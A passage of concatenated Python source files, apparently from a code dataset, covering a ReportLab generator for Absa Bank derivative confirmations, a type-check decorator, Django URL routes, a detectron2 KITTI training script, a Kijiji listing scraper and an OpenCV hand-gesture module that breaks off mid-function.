spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 55, bulletIndent = 18)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n bodyStyle7 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 75) \n bodyStyle8 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 67) \n bodyStyle9 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 87) \n bodyStyle10 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 70) \n \n para1 = Paragraph(Text1, bodyStyle1)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle3)\n para5 = Paragraph(Text5, bodyStyle4)\n para6 = Paragraph(Text6, bodyStyle8)\n para7 = Paragraph(Text7, bodyStyle7)\n para8 = Paragraph(Text8, bodyStyle7)\n para9 = Paragraph(Text9, bodyStyle7)\n para10 = Paragraph(Text10, bodyStyle4)\n para11 = Paragraph(Text11, bodyStyle9)\n para12 = Paragraph(Text12, bodyStyle9)\n para13 = Paragraph(Text13, bodyStyle9)\n para14 = Paragraph(Text14, bodyStyle10)\n para15 = Paragraph(Text15, bodyStyle3)\n para16 = Paragraph(Text16, bodyStyle10)\n para17 = Paragraph(Text17, bodyStyle10)\n para18 = Paragraph(Text18, bodyStyle3)\n para19 = Paragraph(Text19, bodyStyle10)\n para20 = Paragraph(Text20, bodyStyle10)\n para21 = Paragraph(Text21, bodyStyle3)\n para22 = Paragraph(Text22, bodyStyle4)\n para23 = Paragraph(Text23, bodyStyle4)\n para24 = Paragraph(Text24, bodyStyle4)\n para25 = Paragraph(Text25, bodyStyle4)\n \n mydata = [para1, para3, para4, para5, para6,\\\n para7, para8, para9, para10, para11,\\\n para12, para13, para14, para15, para16,\\\n para17, 
para18, para19, para20, para21, para22,\\\n para23, para24, para25]\n \n frame.addFromList(mydata, canvas) \n canvas.showPage()\n \ndef ShortMod5(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(3.4 * cm, 21.78*cm, '(b)')\n canvas.drawString(3.4 * cm, 19.9*cm, '(d)')\n canvas.drawString(3.4 * cm, 17.5*cm, '(b)')\n \n Text1 =('5. Additional Termination Events:')\n Text2 =('You represent to us on the date on which this Transaction is entered into and will be deemed to represent\\\n continuously for the duration of the term of this Transaction and at all times until the termination of this\\\n Transaction that:')\n Text3 =('5.1 you are not a sanctioned entity; and ') \n Text4 =('5.2 this Transaction is not a sanctioned transaction.')\n Text5 =('Notwithstanding the provisions of the Agreement, including but not limited to Section 5(c)(ii) of the\\\n Agreement, any misrepresentation in respect of paragraph 5.1 and 5.2 above shall constitute an Illegality\\\n as contemplated in Section 5(b)(i) of the Agreement with this Transaction as the Affected Transaction.')\n Text6 =('For purposes of these representations:')\n Text7 =('\"sanctioned entity\" means an entity that:')\n Text8 =('(a) is listed in any sanction list and/or')\n Text9 =(' is subject to some form of financial or economic limitations, or in respect of which there is some form\\\n of financial or economic limitation on other parties dealing with it, in terms of the applicable law and/or ') \n Text10 =('(c) is located or incorporated in a sanctioned jurisdiction and/or ')\n Text11 =(' is owned or controlled by an entity that is located or incorporated in a sanctioned jurisdiction and/or ')\n Text12 =('(e) undertakes significant business activity in a sanctioned jurisdiction;')\n Text13 =('\"sanctioned jurisdiction \" means a country or territory:')\n Text14 =('(a) that is listed in a sanction list and/or ') \n Text15 =(' in respect of which there is some form of financial or economic limitation on other persons or \\\n countries dealing with or making payments or deliveries to or receiving payments or deliveries from\\\n such country or territory, in terms of the applicable law;')\n Text16 =('\"sanction list\" means any of the sanction lists of HM Treasury in the United Kingdom\\\n of Britain and Northern Ireland, the Bank of England, the Office of Foreign Asset Control and/or the\\\n United Nations Security Council (each as amended, supplemented or substituted from time to time); and') \n Text17 =('\"sanctioned transaction\" means any payment, receipt or delivery of cash or assets to or\\\n from an entity that is a sanctioned entity or is located within a sanctioned jurisdiction;')\n Text18 =('\"applicable law\" as contemplated in Section 5(b)(i) of the Agreement and any related sections\\\n of the Agreement and this Confirmation includes, without limitation, all laws, regulations, rules,\\\n directives and policies regarding the combating of criminal activities, money laundering and terrorist\\\n financing issued by any statutory, regulatory, supervisory and/or other governmental agency of any\\\n country in which payment, delivery or compliance is required by either one of us or any Credit Support\\\n Provider of any one of us, as the case may be.\"') \n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle2 = ParagraphStyle('Text', 
spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 55)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n bodyStyle7 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 75) \n bodyStyle8 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 70)\n \n para1 = Paragraph(Text1, bodyStyle1)\n para2 = Paragraph(Text2, bodyStyle2)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle2)\n para5 = Paragraph(Text5, bodyStyle2)\n para6 = Paragraph(Text6, bodyStyle2)\n para7 = Paragraph(Text7, bodyStyle2)\n para8 = Paragraph(Text8, bodyStyle4)\n para9 = Paragraph(Text9, bodyStyle8)\n para10 = Paragraph(Text10, bodyStyle4)\n para11 = Paragraph(Text11, bodyStyle8)\n para12 = Paragraph(Text12, bodyStyle4)\n para13 = Paragraph(Text13, bodyStyle2)\n para14 = Paragraph(Text14, bodyStyle4)\n para15 = Paragraph(Text15, bodyStyle8)\n para16 = Paragraph(Text16, bodyStyle2)\n para17 = Paragraph(Text17, bodyStyle2)\n para18 = Paragraph(Text18, bodyStyle2)\n \n mydata = [para1, para2, para3, para4, para5,\\\n para6, para7, para8, para9, para10,\\\n para11, para12, para13, para14, para15,\\\n para16, para17, para18]\n \n frame.addFromList(mydata, canvas) \n canvas.showPage()\n \ndef AccountDetails(canvas, t):\n\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 27.43*cm, '8.')\n canvas.setFont(\"Helvetica-Bold\", 8.0)\n canvas.drawString(2.0 * cm, 27.43*cm, 'Account Details')\n canvas.drawString(2.0 * cm, 26.5*cm, 'Payment to ABSA:')\n \n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.5 * cm, 26.0*cm, 'Name of Account:')\n canvas.drawString(2.5 * cm, 25.5*cm, 'Account Number:')\n canvas.drawString(2.5 * cm, 25.0*cm, 'Branch Code:')\n \n #ABSA Account Details\n canvas.drawString(6.5 * cm, 26.0*cm, 'Absadirect - ABSAZAJJ')\n canvas.drawString(6.5 * cm, 25.5*cm, '660 158 642')\n canvas.drawString(6.5 * cm, 25.0*cm, '632505')\n \n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 23.5*cm, 'Payment to Counterparty:')\n \n #Counterparty Account Number\n act = t.counterparty_ptynbr.accounts()\n CPAccountNumber = ' '\n for acc in act:\n CPAccountNumber = str(acc.account)\n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.0 * cm, 23.0*cm, 'Please provide payment details to ABSA by sending it to facsimile number +27 11 350-7941, for attention ')\n canvas.drawString(2.0 * cm, 22.6*cm, 'Settlements Department')\n \n \n canvas.drawString(1.5 * cm, 21.0*cm, '9.')\n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 21.0*cm, 'Offices')\n canvas.drawString(2.0 * cm, 20.5*cm, 'ABSA:')\n \n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.0 * cm, 20.0*cm, 'Third Floor(3S) Absa Towers North')\n canvas.drawString(2.0 * cm, 19.5*cm, '180 Commissioner Street')\n 
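# Note (added): ReportLab's canvas origin is the bottom-left corner of the page,\n # so these y-offsets in cm count upward from the bottom of the sheet.\n 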
canvas.drawString(2.0 * cm, 19.0*cm, 'Johannesburg 2001')\n canvas.drawString(2.0 * cm, 18.5*cm, 'South Africa')\n \n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 17.5*cm, 'Counterparty:')\n canvas.drawString(2.0 * cm, 17.0*cm, t.counterparty_ptynbr.fullname)\n \n\n\ndef ShortMod6(canvas, t):\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n h1 = styleSheet['Heading3']\n Text2 = (' ')\n \n Text1 =('Upon receipt hereof, the Counterparty hereby agrees to review this Confirmation (Ref No. '+ str(t.trdnbr)+')\\\n and to either ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =350,\\\n alignment = 4)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n\ndef ShortMod7(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n Text1 =('i)\tnotify ABSA of any errors or discrepancies; or ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12,\\\n spaceAfter =375, alignment = 4)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod8(canvas):\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 13.58*cm, 'ii)')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n \n Text1 =(' confirm that the foregoing correctly sets forth the terms of the agreement between us with\\\n respect to this particular Transaction to which this Confirmation relates by signing this Confirmation\\\n and returning to facsimile +27 11 350-7941, attention Derivative Confirmations Division; or ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =390,\\\n alignment = 4, leftIndent = 10)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas) \n \ndef ShortMod9(canvas):\n\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.4*cm, 12.2*cm, 'iii)')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n \n Text1 =(' achieve an exchange of Confirmations as intended by Section 9(e)(ii) of the 2002 ISDA Form by\\\n sending an authorised Confirmation in ISDA format to facsimile number +27 11 350-7941, attention Derivative\\\n Confirmations Division. ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =430\\\n , alignment = 4, leftIndent = 10)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n frame.addFromList(mydata, canvas) \n \n canvas.showPage()\n \ndef Disclaimer(canvas):\n\n \n frame = Frame( 0.5*inch, \n 1*inch, \n 7*inch, \n 10*inch, \n showBoundary =0 \n )\n Text1 =('THIS IS AN IMPORTANT NOTICE - PLEASE READ CAREFULLY')\n Text3 =('The information disclosures provided by you were used to conclude this transaction to ensure that your\\\n financial needs and objectives were met. 
You acknowledge that the product is appropriate and adequate\\\n and no advice, as defined by Financial Advisory and Intermediary Services Act, 37 of 2002 (FAIS) was \\\n required to be provided by Absa Bank Limited (\"Absa Bank\") to you. The investment/transaction/products \\\n may involve a high degree of risk including, but not limited to, the risk of (a) low or no investment\\\n returns, (b) capital loss, (c) counterparty or issuer default, (d) adverse or unanticipated financial \\\n market fluctuations, (e) inflation and (f) currency exchange. The value of any investment/transaction\\\n (product) may fluctuate daily as a result of these risks. Absa Bank does not predict any (actual) results,\\\n performances and/or financial returns and gives no assurances, warranties or guarantees in this regard.\\\n Any information on past financial returns, modeling or back-testing is no indication of future returns\\\n or performance.')\n \n Text4 =('Please take note of the following:') \n \n Text5 =('1.The Financial Services Provider, Absa Bank is a duly authorised Category 1 Financial Services Provider.') \n \n Text6 =('2.Complaints:')\n \n Text7 =('2.1 Should you be dissatisfied with the service rendered by the Absa representative, you may lodge\\\n a complaint with Action Line on the following number: 0800 414141 or fax 012 367 1212. The complaints\\\n policy and procedure is available to you upon request.')\n \n Text8 =('2.2 Should you be dissatisfied with the outcome communicated to you in writing as the investigation may \\\n be unfavourable to you, you may, within six months of receiving the written notice, pursue the complaint \\\n with the relevant Ombuds office. The Ombuds contact details are:\\\n Tel:\t0860FAISOM / 0860324766\tFax:\t012 348 3447\\\n Email:\tinfo@faisombud.co.za')\n \n Text9 =('3.\tAbsa Bank has professional indemnity insurance cover.')\n Text10 =('4.Absa Bank does not assume responsibility for the performance of investments nor for the timing of portfolio changes.')\n \n Text12 =('5.The details of the Absa Bank Compliance Department are as follows:\\\n Tel:\t 011 350 4355\tFax:\t011 350 7419')\n \n Text13 =('6.The financial service rendered was in accordance with the FAIS Act General code of conduct.') \n Text14 =('7.The Absa Bank Representative has been registered with the Financial Services Board.') \n Text15 =('8.The Absa Bank representative has utilised his or her professional knowledge and ability to provide\\\n the appropriate service to you and has taken all reasonable steps to ensure your fair treatment.')\n Text16 =('9.The Absa Bank representative declared that he/she is a permanent employee and declared that no\\\n other personal interest in concluding this transaction exists. Further, there are no circumstances\\\n that may give rise to an actual or potential conflict of interest.') \n Text17 =('10.The Absa Bank representative declared that, should a personal interest exist (other than the receipt \\\n of commission and/or fees), he/she undertook to inform the customer of the nature of the conflict and \\\n take all reasonable steps to ensure fair treatment to the customer. 
') \n Text18 =('11.Should you encounter a possible misrepresentation, non-disclosure of a material fact or the \\\n inclusion of incorrect information, please communicate this incident in writing to the Absa Action Line.') \n Text19 =('12.In the event that the financial product recommended is a replacement product the Absa Representative\\\n fully disclosed to you the actual and potential financial implications, costs and consequences of such\\\n a replacement.') \n Text20 =('13.In the event that a full analysis could not be undertaken there may be limitations on the\\\n appropriateness of the financial product you selected. You should take particular care to consider\\\n on your own whether the financial product is appropriate considering your objectives, financial \\\n situation and particular needs.')\n\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 120)\n bodyStyle2 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n \n para1 = Paragraph(Text1, bodyStyle1)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle3)\n para5 = Paragraph(Text5, bodyStyle4)\n para6 = Paragraph(Text6, bodyStyle4)\n para7 = Paragraph(Text7, bodyStyle5)\n para8 = Paragraph(Text8, bodyStyle5)\n para9 = Paragraph(Text9, bodyStyle3)\n para10 = Paragraph(Text10, bodyStyle3)\n para12 = Paragraph(Text12, bodyStyle3)\n para13 = Paragraph(Text13, bodyStyle6)\n para14 = Paragraph(Text14, bodyStyle6)\n para15 = Paragraph(Text15, bodyStyle6)\n para16 = Paragraph(Text16, bodyStyle6)\n para17 = Paragraph(Text17, bodyStyle6)\n para18 = Paragraph(Text18, bodyStyle6)\n para19 = Paragraph(Text19, bodyStyle6)\n para20 = Paragraph(Text20, bodyStyle6)\n \n mydata = [para1, para3, para4, para5, para6, para7, para8, para9, para10,\\\n para12, para13, para14, para15, para16, para17, para18, para19, para20]\n \n frame.addFromList(mydata, canvas) \n","sub_path":"Python modules/ShortFormLegal.py","file_name":"ShortFormLegal.py","file_ext":"py","file_size_in_byte":30246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"300372618","text":"from functools import wraps\n\ndef unexpected_type(name, exp, val):\n if isinstance(exp, tuple):\n exp = ' '.join(['%s or' % x for x in exp[:-1]]) + '%s' % exp[-1]\n raise TypeError('expected \"%s\" to be %s, got %s' % (name, exp, type(val)))\n\ndef has_valid_type(argname, argtypes, val):\n for argtype in argtypes:\n if isinstance(val, argtype):\n return\n unexpected_type(argname, argtypes, val)\n\ndef argtypes(**decls):\n\n def decorator(f):\n code = f.__code__\n names = code.co_varnames[:code.co_argcount]\n\n @wraps(f)\n def decorated(*args, **kwargs):\n for argname, argtypes in decls.items():\n try:\n val = args[names.index(argname)]\n except 
(IndexError, ValueError):\n val = kwargs.get(argname)\n if argtypes == callable:\n if not callable(val):\n unexpected_type(argname, 'function', val)\n elif isinstance(argtypes, tuple):\n if argtypes == ():\n raise ValueError('argtypes cannot be empty tuple')\n has_valid_type(argname, argtypes, val)\n elif not isinstance(val, argtypes):\n unexpected_type(argname, argtypes, val)\n return f(*args, **kwargs)\n return decorated\n return decorator","sub_path":"argtypes/argtypes.py","file_name":"argtypes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"311943025","text":"from django.urls import path\nfrom .views import ProveedorView, ProveedorNew, ProveedorEdit, proveedorInactivar,\\\n ComprasView, compras\n\nurlpatterns = [\n\n path('proveedor/', ProveedorView.as_view(), name='proveedor_list'),\n path('proveedor/new', ProveedorNew.as_view(), name='proveedor_new'),\n # NOTE: the '<int:pk>' / '<int:id>' converter names below are assumptions.\n path('proveedor/edit/<int:pk>', ProveedorEdit.as_view(), name='proveedor_edit'),\n path('proveedor/inactivar/<int:id>', proveedorInactivar, name='proveedor_inactivar'),\n\n path('compras/', ComprasView.as_view(), name='compras_list'),\n path('compras/new',compras, name=\"compras_new\"),\n]","sub_path":"cmp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"28842507","text":"import os\nimport numpy as np\nimport cv2\nimport torch\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.data import DatasetCatalog\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, build_detection_test_loader\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.modeling import build_model\nfrom detectron2.checkpoint import DetectionCheckpointer\n\nfrom .utils import KittiMots\nfrom .utils import KITTI_CATEGORIES, TEST_INFERENCE_VALUES\nfrom .utils import ValidationLoss, plot_validation_loss\n\n\ndef experiment_3(exp_name, model_file, checkpoint=None):\n\n print('Running Task B experiment', exp_name)\n SAVE_PATH = os.path.join('./results_week_6_task_b', exp_name)\n os.makedirs(SAVE_PATH, exist_ok=True)\n\n # Loading data\n print('Loading data')\n kittiloader = KittiMots()\n def rkitti_train(): return kittiloader.get_dicts(flag='train', method='complete', percentage= 1.0)\n def rkitti_val(): return kittiloader.get_dicts(flag='val')\n def rkitti_test(): return kittiloader.get_dicts(flag='test')\n DatasetCatalog.register('KITTI_train', rkitti_train)\n MetadataCatalog.get('KITTI_train').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n DatasetCatalog.register('KITTI_val', rkitti_val)\n MetadataCatalog.get('KITTI_val').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n DatasetCatalog.register('KITTI_test', rkitti_test)\n MetadataCatalog.get('KITTI_test').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n\n # Load model and configuration\n print('Loading Model')\n cfg = get_cfg()\n cfg.merge_from_file(model_zoo.get_config_file(model_file))\n cfg.DATASETS.TRAIN = ('KITTI_train', )\n cfg.DATASETS.TEST = ('KITTI_val', )\n cfg.DATALOADER.NUM_WORKERS = 4\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\n cfg.OUTPUT_DIR = SAVE_PATH\n if checkpoint:\n last_checkpoint = torch.load(checkpoint)\n new_path = checkpoint.split('.')[0]+'_modified.pth'\n last_checkpoint['iteration'] 
= -1\n torch.save(last_checkpoint,new_path)\n cfg.MODEL.WEIGHTS = new_path\n else:\n raise ValueError('You forgot to put the chekpoint for this experiment')\n cfg.SOLVER.IMS_PER_BATCH = 4\n cfg.SOLVER.BASE_LR = 0.00025\n cfg.SOLVER.MAX_ITER = 4000\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 256\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 3\n cfg.TEST.SCORE_THRESH = 0.5\n\n # Training\n print('Training')\n trainer = DefaultTrainer(cfg)\n val_loss = ValidationLoss(cfg)\n trainer.register_hooks([val_loss])\n trainer._hooks = trainer._hooks[:-2] + trainer._hooks[-2:][::-1]\n trainer.resume_or_load(resume=False)\n trainer.train()\n\n # Evaluation\n print('Evaluating')\n cfg.DATASETS.TEST = ('KITTI_test', )\n evaluator = COCOEvaluator('KITTI_test', cfg, False, output_dir=SAVE_PATH)\n trainer.model.load_state_dict(val_loss.weights)\n trainer.test(cfg, trainer.model, evaluators=[evaluator])\n print('Plotting losses')\n plot_validation_loss(cfg, cfg.SOLVER.MAX_ITER, exp_name, SAVE_PATH, 'validation_loss.png')\n\n # Qualitative results: visualize some results\n print('Getting qualitative results')\n predictor = DefaultPredictor(cfg)\n predictor.model.load_state_dict(trainer.model.state_dict())\n inputs = rkitti_test()\n inputs = [inputs[i] for i in TEST_INFERENCE_VALUES]\n for i, input in enumerate(inputs):\n file_name = input['file_name']\n print('Prediction on image ' + file_name)\n img = cv2.imread(file_name)\n outputs = predictor(img)\n v = Visualizer(\n img[:, :, ::-1],\n metadata=MetadataCatalog.get(cfg.DATASETS.TRAIN[0]),\n scale=0.8,\n instance_mode=ColorMode.IMAGE)\n v = v.draw_instance_predictions(outputs['instances'].to('cpu'))\n cv2.imwrite(os.path.join(SAVE_PATH, 'Inference_' + exp_name + '_inf_' + str(i) + '.png'), v.get_image()[:, :, ::-1])","sub_path":"Week6/TaskB/src/experiment_3.py","file_name":"experiment_3.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"82742948","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nsession_requests = requests.session()\r\n\r\n\r\n# numPages - the number of pages from Kijijii that are parsed\r\n# city - name of the city the listings are being pulled from (must match a name in the dictionary below)\r\n# Returns - an array of strings representing the URLs of each listing (each listing has its own page on Kijiji\r\ndef listings(city, numPages):\r\n arr = []\r\n \r\n # retrive general structure of url for kijiji page from city\r\n value = mapping[city]\r\n \r\n # array of url of pages that contain listings\r\n pages = map(lambda y: value[0] + str(y) + value[1], range(1, numPages + 1)) \r\n \r\n # iterate through every page\r\n for x in pages:\r\n \r\n kijijii = session_requests.get(x)\r\n \r\n soup = BeautifulSoup(kijijii.text,'html.parser')\r\n \r\n # grab every tag that represents a listing on the page (tag can change over time)\r\n postings = soup.find_all(\"a\", class_= \"title \")\r\n \r\n # add every listing on the page to arr\r\n arr = arr + list(map(lambda v: \"https://www.kijiji.ca\" + v[\"href\"], postings))\r\n \r\n return arr\r\n\r\n# The following is a dictionary maintained to map each city to it's corresponding Kijijii URL\r\nmapping = {\r\n \"Toronto\" : [\"https://www.kijiji.ca/b-apartments-condos/gta-greater-toronto-area/page-\", \"/c37l1700272\"]\r\n }","sub_path":"Mapping.py","file_name":"Mapping.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 
+{"seq_id":"163160819","text":"\"\"\"\nIncludes demos of gesture tracking and recognition as required in video.\n\"\"\"\nimport cv2\nimport numpy as np\n\ndef resize(img, scale=0.5):\n width = int(img.shape[1] * scale)\n height = int(img.shape[0] * scale)\n dim = (width, height)\n # resize image\n return cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\ndef imshow_smaller(title, img, scale=0.75):\n img_small = resize(img, scale=scale)\n cv2.imshow(title, img_small)\n\ndef add_text(img, text, location, scale=1):\n cv2.putText(img, text, location, cv2.FONT_HERSHEY_COMPLEX, scale, [max_color,0,max_color], thickness=3)\n\ndef add_text_top_left(img, text, scale=1):\n add_text(img, text, (50, 50), scale=scale)\n\ndef add_text_bottom_left(img, text, scale=1):\n add_text(img, text, (50, 670), scale=scale)\n\ndef hsv_and_ycrcb_mask(frame):\n lower_HSV = np.array([0, 40, 0], dtype = \"uint8\")\n upper_HSV = np.array([25, 255, 255], dtype = \"uint8\")\n \n converted_HSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n skin_mask_HSV = cv2.inRange(converted_HSV, lower_HSV, upper_HSV)\n\n lower_YCrCb = np.array([0, 138, 67], dtype = \"uint8\")\n upper_YCrCb = np.array((255, 173, 133), dtype = \"uint8\")\n \n converted_YCrCb = cv2.cvtColor(frame, cv2.COLOR_BGR2YCrCb)\n skin_mask_YCrCb = cv2.inRange(converted_YCrCb, lower_YCrCb, upper_YCrCb)\n \n return cv2.add(skin_mask_HSV, skin_mask_YCrCb)\n\ndef blur_noise(frame, skin_mask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))\n skin_mask = cv2.erode(skin_mask, kernel, iterations = 2)\n skin_mask = cv2.dilate(skin_mask, kernel, iterations = 2)\n \n # Blur the mask to help remove noise, then apply the mask to the frame.\n skin_mask = cv2.GaussianBlur(skin_mask, (3, 3), 0)\n return cv2.bitwise_and(frame, frame, mask=skin_mask)\n\ndef threshold_binarize(frame, invert=False):\n \"\"\" Returns the threshold value and the binarized image. \"\"\"\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n thresh_type = (cv2.THRESH_BINARY_INV if invert else 0) + cv2.THRESH_OTSU\n return cv2.threshold(gray, 0, max_color, thresh_type)\n\ndef get_connected_components(frame):\n ret, markers, stats, centroids = cv2.connectedComponentsWithStats(frame, ltype=cv2.CV_16U)\n markers = np.array(markers, dtype=np.uint8)\n label_hue = np.uint8(179 * markers / np.max(markers))\n blank_ch = max_color * np.ones_like(label_hue)\n labeled_img = cv2.merge([label_hue, blank_ch, blank_ch])\n labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_HSV2BGR)\n labeled_img[label_hue==0] = 0\n return ret, stats, labeled_img\n\ndef detect_hand_ellipse_hole(binary_frame, annotate=False):\n \"\"\"\n Returns the ellipse center, minor and major axis lengths, angle, and annotated frame.\n Tries to detect a hole in the hand gesture, and if detected returns the parameters of\n an ellipse matching the contour. 
